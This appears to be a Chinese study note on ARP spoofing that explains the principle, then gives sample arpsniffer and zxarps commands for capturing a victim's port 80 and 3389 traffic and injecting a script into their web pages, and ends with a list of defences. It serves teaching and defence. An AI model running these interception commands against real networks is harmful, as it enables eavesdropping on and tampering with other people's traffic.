作用在网络协议的第二层数据链路层
信息传递通过MAC地址
ARP只有在内网中才能起到作用
类似与中间人攻击
使用到的工具:ettercap、arpsniffer、zxarps、cain
什么是ARP?
A要和B进行直接通信,必须要知道目标主机B的MAC地址。B的MAC地址就是通过地址解析协议获得的。
所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。
ARP欺骗的原理是什么?
把自己的MAC地址伪造成网关的地址来欺骗其它的主机
A跟B通讯,A的通讯录(缓存表)中没有B的联系方式(A不认识B),A到群(网关)里发消息要B的联系方式,这个时候C出来说“我是B,我的联系方式是XX(MAC地址)”,这时A把C的联系方式放在通讯录(缓存表)里并备注为B。下次A要找B时,相当于直接找了C,C再找B。
ARP欺骗有哪几种方式?
单向欺骗:只骗A,不骗B
双向欺骗:即骗A又骗B
实验命令
arpsniffer
定位到安装目录
arpsniffer.exe 网关ip 被攻击者ip 端口,端口 内容保存的文件名
arpsniffer.exe 192.168.17.1 192.168.17.14 80,3389 test.txt—抓取192.168.17.14的80,、3389端口的数据包存放在test.txt文件中
zxarps
该工具需安装winpcap才能使用,可加入xss的内容
定位到安装目录
zxarps.exe -idx 0 -ip 被攻击者ip -p 80 -insert “xss攻击语句”
zxarps.exe -idx 0 -ip 192.168.17.14 -p 80 -insert “< script>alter(“ok”)< /script>”—192.168.17.14 浏览网页时弹出ok对话框
zxarps -idx 0 -ip 192.168.17.17,192.168.17.107 -p 80 -save_a test.txt—截取192.168.17.17,192.168.17.107的网页请求并保存到test.txt文件中
ARP防御
- 不要随意登录免费的WIFI
- 使用ARP绑定
- 开启电脑管家或者360安全卫士的ARP防火墙或金山贝壳或彩影ARP防火墙
- 使用https协议或者其他有保密协议的连接访问外网
防御链接
https://wenku.baidu.com/view/55efed86f71fb7360b4c2e3f5727a5e9856a27cd.html-神州数码
https://wenku.baidu.com/view/89772efb7e192279168884868762caaedd33bade.html-H3C
arp相关命令